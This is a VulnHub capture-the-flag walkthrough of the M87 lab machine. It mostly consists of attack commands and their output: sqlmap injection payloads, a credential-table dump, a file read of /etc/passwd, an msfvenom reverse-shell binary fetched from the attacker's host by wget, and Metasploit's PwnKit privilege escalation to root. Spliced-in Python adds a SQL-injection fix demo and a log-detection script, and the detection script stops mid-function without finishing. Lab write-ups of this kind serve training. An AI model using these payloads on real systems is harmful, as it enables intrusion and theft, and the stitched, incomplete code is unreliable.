[Vulnhub Walkthrough] M87 Machine: Detailed Penetration Test

Posted by admin on 2023-04-24 08:17:44


Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
 192.168.56.100  08:00:27:64:18:1b      1      60  PCS Systemtechnik GmbH
 192.168.56.250  08:00:27:10:66:7a      1      60  PCS Systemtechnik GmbH

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.250.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.250 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 22:07 EDT
Nmap scan report for bogon (192.168.56.250)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE         VERSION
22/tcp   filtered ssh
80/tcp   open     http            Apache httpd 2.4.38 ((Debian))
|_http-title: M87 Login Form
|_http-server-header: Apache/2.4.38 (Debian)
9090/tcp open     ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p

The Nmap scan shows three ports on the target: 22 (ssh, reported as filtered), 80 (http) and 9090 (ssl).

Getting a shell

Browsing to port 80 shows a user login page that asks for an email address and a password.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h http://192.168.56.250
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.250
+ Target Hostname:    192.168.56.250
+ Target Port:        80
+ Start Time:         2023-04-09 22:14:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 52a, size: 5b295a9e85480, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-09 22:15:58 (GMT-4) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to updates@cirt.net) (y/n)? 

Nikto found the /admin directory; browsing to it shows another user login page.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ gobuster dir -u http://192.168.56.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.250
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,js,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/09 22:19:24 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1322]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.250/admin/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.250/assets/]
/LICENSE              (Status: 200) [Size: 1073]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1321374 / 1323366 (99.85%)
===============================================================
2023/04/09 22:24:03 Finished
===============================================================

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h https://192.168.56.250:9090
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.250
+ Target Hostname:    192.168.56.250
+ Target Port:        9090
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /O=662b442c19a840e482f9f69cde8f316e/CN=M87
                   Ciphers:  TLS_AES_256_GCM_SHA384
                   Issuer:   /O=662b442c19a840e482f9f69cde8f316e/CN=M87
+ Start Time:         2023-04-09 22:20:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
+ Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '192.168.56.250' does not match certificate's names: M87
+ Retrieved access-control-allow-origin header: https://192.168.56.250:9090
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  18 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-09 22:28:40 (GMT-4) (490 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The /admin directory found on port 80 is a user login page; testing it turned up no SQL injection. So the next step is to scan /admin further:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ dirb http://192.168.56.250

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr  9 22:53:30 2023
URL_BASE: http://192.168.56.250/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.250/ ----
==> DIRECTORY: http://192.168.56.250/admin/
==> DIRECTORY: http://192.168.56.250/assets/
+ http://192.168.56.250/index.html (CODE:200|SIZE:1322)
+ http://192.168.56.250/LICENSE (CODE:200|SIZE:1073)
+ http://192.168.56.250/server-status (CODE:403|SIZE:279)

---- Entering directory: http://192.168.56.250/admin/ ----
==> DIRECTORY: http://192.168.56.250/admin/backup/
==> DIRECTORY: http://192.168.56.250/admin/css/
==> DIRECTORY: http://192.168.56.250/admin/images/
+ http://192.168.56.250/admin/index.php (CODE:200|SIZE:4393)
==> DIRECTORY: http://192.168.56.250/admin/js/

---- Entering directory: http://192.168.56.250/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.250/admin/backup/ ----
+ http://192.168.56.250/admin/backup/index.php (CODE:200|SIZE:4412)

---- Entering directory: http://192.168.56.250/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.250/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.250/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Apr  9 22:53:49 2023
DOWNLOADED: 13836 - FOUND: 5

Under /admin, dirb found /backup, which is yet another user login page. Attempts at a login bypass failed, so the backup page was fuzzed for parameters:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ wfuzz -c -u http://192.168.56.250/admin/backup/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 161
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.250/admin/backup/?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000529:   200        87 L     162 W      4459 Ch     "id"
000000759:   200        3 L      2 W        19 Ch       "file"

Two parameters, id and file, were found. Looking at id first:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ curl http://192.168.56.250/admin/backup/?id=id
<html>

</html>
jackceobradexpensesjuliamikeadrianjohnadminalex

This confirms that the id parameter is live.

Testing the file parameter produced no corresponding output.

A quick test shows that the id parameter is vulnerable to SQL injection:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1'
[23:00:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(5676=5676,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5427 FROM (SELECT(SLEEP(5)))XWSn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a6b6a71,0x75784a6770575651456c4d7279414c434a497241437a534b486d475a456b62625974585579426b6f,0x7176787171)-- -
---
[23:00:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:00:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.250'
[23:00:57] [WARNING] your sqlmap version is outdated

[*] ending @ 23:00:57 /2023-04-09/
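As an added illustration (not code from the original walkthrough), the following Python rebuilds the /admin/backup/?id= lookup two ways against an in-memory SQLite copy of the `users` table: a hypothetical reconstruction that splices the raw parameter into the SQL, which reproduces the `?id=id` result above and the shape of sqlmap's UNION test, beside a version that validates and binds the value. The target ran MariaDB; SQLite, the sample rows and the function names are assumptions.

```python
import sqlite3
from typing import List

# Constructed sample rows shaped like the dumped `users` table
# (id, email, username, password); the values are placeholders, not M87's data.
SAMPLE_USERS = [
    (1, "jack@localhost", "jack", "placeholder-1"),
    (2, "ceo@localhost", "ceo", "placeholder-2"),
    (3, "admin@localhost", "admin", "placeholder-3"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in (assumption) for the target's MariaDB db.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, email TEXT, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> List[str]:
    """Hypothetical reconstruction of the backup page's query: the raw ?id=
    value is spliced into the SQL text. Passing the string `id` yields
    `WHERE id = id`, true for every row, which is why the curl call in the
    walkthrough got the whole username column back."""
    sql = f"SELECT username FROM users WHERE id = {user_input}"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn: sqlite3.Connection, user_input: str) -> List[str]:
    """Same lookup with two fixes: reject anything that is not a decimal
    integer (the column is int(11)), then bind the value as a parameter so
    it can never change the statement's structure."""
    if not user_input.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(user_input),))]


def demo() -> dict:
    """Run both versions against the inputs discussed in the walkthrough."""
    conn = make_db()
    union = "1 UNION ALL SELECT email FROM users"  # shape of sqlmap's UNION test
    results = {
        "vuln_id_eq_id": lookup_vulnerable(conn, "id"),   # every username
        "vuln_union": lookup_vulnerable(conn, union),     # another column leaks
        "hard_1": lookup_hardened(conn, "1"),             # exactly one row
    }
    try:
        lookup_hardened(conn, "id")
        results["hard_id"] = "accepted"
    except ValueError:
        results["hard_id"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```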

└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --dbs
available databases [4]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema

└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db --tables
Database: db
[1 table]
+-------+
| users |
+-------+

└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users --columns
Table: users
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | varchar(50) |
| id       | int(11)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users -C email,username,password --dump
+--------------------+----------+-----------------+
| email              | username | password        |
+--------------------+----------+-----------------+
| jack@localhost     | jack     | gae5g5a         |
| ceo@localhost      | ceo      | 5t96y4i95y      |
| brad@localhost     | brad     | gae5g5a         |
| expenses@localhost | expenses | 5t96y4i95y      |
| julia@localhost    | julia    | fw54vrfwe45     |
| mike@localhost     | mike     | 4kworw4         |
| adrian@localhost   | adrian   | fw54vrfwe45     |
| john@localhost     | john     | 4kworw4         |
| admin@localhost    | admin    | 15The4Dm1n4L1f3 |
| alex@localhost     | alex     | dsfsrw4         |
+--------------------+----------+-----------------+

However, none of these email/username/password combinations log in to the default page on port 80, the /admin page, or the /admin/backup page.

Trying to get a shell through sqlmap failed:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --os-shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --file-read /etc/passwd

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.250/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin

The /etc/passwd file read through sqlmap reveals the user charlotte. Try logging in to port 9090 as that user, cycling through the passwords obtained earlier.

After trying them, the password turns out to be 15The4Dm1n4L1f3.

This logs in to the management console on port 9090, which has a terminal feature.

charlotte@M87:~$ ls -alh
total 32K
drwxr-xr-x 3 charlotte charlotte 4.0K Nov  6  2020 .
drwxr-xr-x 3 root      root      4.0K Nov  6  2020 ..
lrwxrwxrwx 1 root      root         9 Nov  6  2020 .bash_history -> /dev/null
-rw-r--r-- 1 charlotte charlotte  220 Nov  6  2020 .bash_logout
-rw-r--r-- 1 charlotte charlotte 3.5K Nov  6  2020 .bashrc
drwx------ 3 charlotte charlotte 4.0K Apr  9 23:15 .gnupg
-rw------- 1 charlotte charlotte   33 Nov  6  2020 local.txt
-rw-r--r-- 1 charlotte charlotte  807 Nov  6  2020 .profile
-rw------- 1 charlotte charlotte   49 Nov  6  2020 .Xauthority
charlotte@M87:~$ cat local.txt
29247ebdec52ba0b9a6fd10d68f6b91f

Next, upgrade the shell to a Meterpreter session.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf

Upload escalate.elf to /tmp on the target:

charlotte@M87:/tmp$ wget http://192.168.56.230:8000/escalate.elf
--2023-04-09 23:19:55--  http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’

escalate.elf                                  100%[=================================================================================================>]     207  --.-KB/s    in 0s      

2023-04-09 23:19:55 (42.5 MB/s) - ‘escalate.elf’ saved [207/207]

charlotte@M87:/tmp$ chmod +x escalate.elf

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:5555 

Run escalate.elf on the target:

[*] Started reverse TCP handler on 192.168.56.230:5555 
[*] Sending stage (989032 bytes) to 192.168.56.250
[*] Meterpreter session 1 opened (192.168.56.230:5555 -> 192.168.56.250:34932) at 2023-04-09 23:22:06 -0400

meterpreter > 

A Meterpreter session is obtained.

Then use the local_exploit_suggester module to locate vulnerabilities usable for privilege escalation.

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.250 - Collecting local exploits for x86/linux...
[*] 192.168.56.250 - 167 exploit checks are being tried...
[+] 192.168.56.250 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.250 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.250 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 4   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

Pick the first one for local privilege escalation:

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.kngdnssvny
[+] The target is vulnerable.
[*] Writing '/tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.mefpssoat
[*] Sending stage (3020772 bytes) to 192.168.56.250
[+] Deleted /tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so
[+] Deleted /tmp/.mefpssoat/.qqfoljnxo
[+] Deleted /tmp/.mefpssoat
[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.250:40732) at 2023-04-09 23:26:24 -0400

id

meterpreter > 
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 11811 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
cd /root
ls -alh
total 28K
drwx------  4 root root 4.0K Nov  6  2020 .
drwxr-xr-x 18 root root 4.0K Nov  6  2020 ..
lrwxrwxrwx  1 root root    9 Nov  6  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K Nov  6  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Nov  6  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1.2K Nov  6  2020 proof.txt
cat proof.txt


MMMMMMMM               MMMMMMMM     888888888     77777777777777777777
M:::::::M             M:::::::M   88:::::::::88   7::::::::::::::::::7
M::::::::M           M::::::::M 88:::::::::::::88 7::::::::::::::::::7
M:::::::::M         M:::::::::M8::::::88888::::::8777777777777:::::::7
M::::::::::M       M::::::::::M8:::::8     8:::::8           7::::::7
M:::::::::::M     M:::::::::::M8:::::8     8:::::8          7::::::7
M:::::::M::::M   M::::M:::::::M 8:::::88888:::::8          7::::::7
M::::::M M::::M M::::M M::::::M  8:::::::::::::8          7::::::7
M::::::M  M::::M::::M  M::::::M 8:::::88888:::::8        7::::::7
M::::::M   M:::::::M   M::::::M8:::::8     8:::::8      7::::::7
M::::::M    M:::::M    M::::::M8:::::8     8:::::8     7::::::7
M::::::M     MMMMM     M::::::M8:::::8     8:::::8    7::::::7
M::::::M               M::::::M8::::::88888::::::8   7::::::7
M::::::M               M::::::M 88:::::::::::::88   7::::::7
M::::::M               M::::::M   88:::::::::88    7::::::7
MMMMMMMM               MMMMMMMM     888888888     77777777


Congratulations!

You've rooted m87!

21e5e63855f249bcd1b4b093af669b1e

mindsflee

At this point we have a root shell and the root flag.

Lessons learned

Don't rely on a single tool for directory scanning, or you will miss important second-level directories.

The key to this machine is that, after identifying /admin/backup/, you still have to fuzz out the parameter. A bit of a brain-teaser.
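From the defender's side, here is an added example (not from the original post) of detection logic for the reconnaissance this walkthrough performs, run over constructed Apache access-log lines: it flags the default user agents of nikto, gobuster, wfuzz and sqlmap, the sqlmap payload fragments shown above, and any source whose 404 count points to a wordlist-driven directory scan. The log lines, the 404 threshold and the function names are assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Apache combined log format. The SAMPLE_LOG lines below are constructed to
# resemble what M87's access log would hold; they were not captured from it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default User-Agent markers of the tools used in the post; each identifies
# itself unless the operator overrides the UA (so this is a weak signal alone).
SCANNER_UA = ("nikto", "gobuster", "wfuzz", "sqlmap")

# Fragments of the sqlmap payloads the post shows, matched after URL-decoding.
SQLI_PATTERNS = [re.compile(p, re.I) for p in (
    r"\bUNION\b.+\bSELECT\b",
    r"\bSLEEP\s*\(",
    r"\bFLOOR\s*\(\s*RAND\s*\(",
    r"\bINFORMATION_SCHEMA\b",
)]

SAMPLE_LOG = [  # constructed
    '192.168.56.230 - - [09/Apr/2023:22:14:57 -0400] "GET /admin/ HTTP/1.1" 200 4393 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"',
    '192.168.56.230 - - [09/Apr/2023:22:19:24 -0400] "GET /foo.php HTTP/1.1" 404 279 "-" "gobuster/3.5"',
    '192.168.56.230 - - [09/Apr/2023:22:19:24 -0400] "GET /foo.html HTTP/1.1" 404 279 "-" "gobuster/3.5"',
    '192.168.56.230 - - [09/Apr/2023:22:19:25 -0400] "GET /bar.txt HTTP/1.1" 404 279 "-" "gobuster/3.5"',
    '192.168.56.230 - - [09/Apr/2023:22:19:25 -0400] "GET /baz.sh HTTP/1.1" 404 279 "-" "gobuster/3.5"',
    '192.168.56.230 - - [09/Apr/2023:22:19:26 -0400] "GET /qux.js HTTP/1.1" 404 279 "-" "gobuster/3.5"',
    '192.168.56.230 - - [09/Apr/2023:23:00:42 -0400] "GET /admin/backup/?id=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 4459 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '192.168.56.230 - - [09/Apr/2023:23:00:50 -0400] "GET /admin/backup/?id=1%20AND%20(SELECT%205427%20FROM%20(SELECT(SLEEP(5)))XWSn) HTTP/1.1" 200 4459 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.56.1 - - [09/Apr/2023:23:05:00 -0400] "GET /admin/backup/?id=3 HTTP/1.1" 200 4459 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-log line into named fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Reasons a single request resembles the recon/attack traffic in the post."""
    reasons = []
    ua = entry["ua"].lower()
    if any(tag in ua for tag in SCANNER_UA):
        reasons.append("scanner-user-agent")
    decoded = unquote_plus(entry["path"])  # %20 etc. hide keywords otherwise
    if any(p.search(decoded) for p in SQLI_PATTERNS):
        reasons.append("sqli-payload")
    return reasons


def analyse(lines: List[str], brute_threshold: int = 5) -> Dict[str, object]:
    """Flag individual requests, plus sources whose 404 volume suggests a
    wordlist scan (gobuster/dirb generate thousands of misses per run)."""
    flagged: List[Tuple[str, str, str]] = []
    not_found: Counter = Counter()
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue  # a real deployment would count malformed lines too
        if e["status"] == "404":
            not_found[e["ip"]] += 1
        for reason in classify(e):
            flagged.append((e["ip"], e["path"], reason))
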